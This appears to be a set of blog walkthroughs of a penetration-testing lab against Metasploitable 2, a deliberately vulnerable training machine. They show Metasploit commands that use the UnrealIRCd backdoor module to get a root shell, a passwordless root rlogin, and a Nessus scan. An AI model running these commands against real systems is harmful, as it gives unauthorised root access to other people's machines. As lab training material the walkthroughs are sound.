Metasploitable 2 – Compromise: UnrealIRC

Lets take a look at this Nmap result in more detail:

6667/tcp  open  irc         UnrealIRCd

Nessus results also show some details here:

Critical (10.0) 46882 UnrealIRCd Backdoor Detection

Worth checking to see if Metasploit has a module we can use here. Fire up Metasploit with:

msfconsole

And lets do a search for any hits on ‘unrealirc’:

search unrealirc

Metasploit_unrealirc

Great we have a hit, lets choose this exploit:

use exploit/unix/irc/unreal_ircd_3281_backdoor

use_unreal_exploit

We now need to configure it. To see what’s required, use:

show options

metasploit_unreal_show-options

Lets set our target (using our Metasploitable IP address) with:

set RHOST 192.168.168.134

Once done you can run ‘show options’ again to confirm it looks good:

metasploit_unrealirc_rhost

Now lets see if it works by typing ‘run’

run

Metasploit_unrealirc_exploit_run

Be aware that you may not get much feedback even if the exploit is successful.

Try typing ‘hostname’ as above and see what comes back. As you can see the exploit was successful, we have root access to the metasploitable box once more.

 

 

 

Metasploitable 2 – Compromise: rlogin

One of the simplest compromises of the Metasploitable box.

We can see from the nmap results:

513/tcp   open  login?

Nessus also detected the use of rlogin:

High (7.5) 10205 rlogin Service Detection

At this stage we don’t have any info on possible accounts on the Metasploitable box but it probably likely that there is a ‘root’ account.

As such we can try the following command and see what we get:

rlogin -l root 192.168.168.134
  • -l: user to login as

rlogin1

So we are prompted for a password – a good sign the root account is valid.

But there is actually more to this than the above suggests.

I am using a fresh install of Kali 2 and the rsh-client is not installed by default. So lets install it with:

apt-get install rsh-client

rsh-client

Now lets try that original rlogin command once more:

rlogin - compromise

Bingo… we’re in, and with root access no less.

Metasploitable 2 – Vuln scan with Nessus

One of the simplest ways to spot a simple attack vector is to simply peform a simple vuln check against the box.

In this case I am going to use Nessus Home (https://www.tenable.com/products/nessus-home) as it is free to sign up and does the job well.

Once Nessus Home is up and running (and up to date) we can kick off a scan against our box:Nessus Scan

And once complete we can take a look at the results:

Nessus_Metasploitable_summary

The full list of results with details can be found here:

Nessus Scan Report